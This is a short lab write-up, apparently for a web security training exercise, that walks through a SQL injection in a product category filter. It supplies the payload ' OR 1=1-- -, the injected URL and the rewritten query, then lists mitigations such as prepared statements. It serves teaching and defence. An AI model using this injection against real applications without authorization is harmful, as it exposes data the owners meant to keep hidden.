# Level 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data ## Objective This lab contains a SQL injection vulnerability in the product category filter. When a user selects a category, the application performs a SQL query similar to: ```sql SELECT * FROM products WHERE category = 'Gifts' AND released = 1 ``` To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products. ## Explanation The application dynamically builds SQL queries based on user input without proper sanitization. This creates an opportunity to inject malicious SQL code into the `category` parameter. By altering the query logic, we can bypass the intended filter that limits results to only released products and retrieve hidden (unreleased) entries from the database. ## Resolution 1. Acess any product category from the main page. 2. Observe the URL structure, which includes a query parameter: ```sql /filter?category=Accessories ``` 3. Replace the `Accessories` value with the following SQL payload: ```sql ' OR 1=1-- - ``` 4. The full URL becomes: ```sql /filter?category=' OR 1=1-- - ``` 5. This injection modifies the query as follows: ```sql SELECT * FROM products WHERE category = '' OR 1=1-- -' AND released = 1 ``` The `-- -` sequence comments out the remainder of the query, effectively bypassing the category filter. Since `1=1` is always true, all released and unreleased products are displayed. 6. If the application reveals at least one unreleased product, the lab is solved.

## Mitigation To prevent SQL injection vulnerabilities like this, applications should: * Use **parameterized queries (prepared statements)** instead of dynamically constructing SQL with user input. * Implement **server-side input validation and sanitization**. * Apply the principle of **least privilege** to database accounts. * Monitor logs for unexpected SQL behavior or anomalies.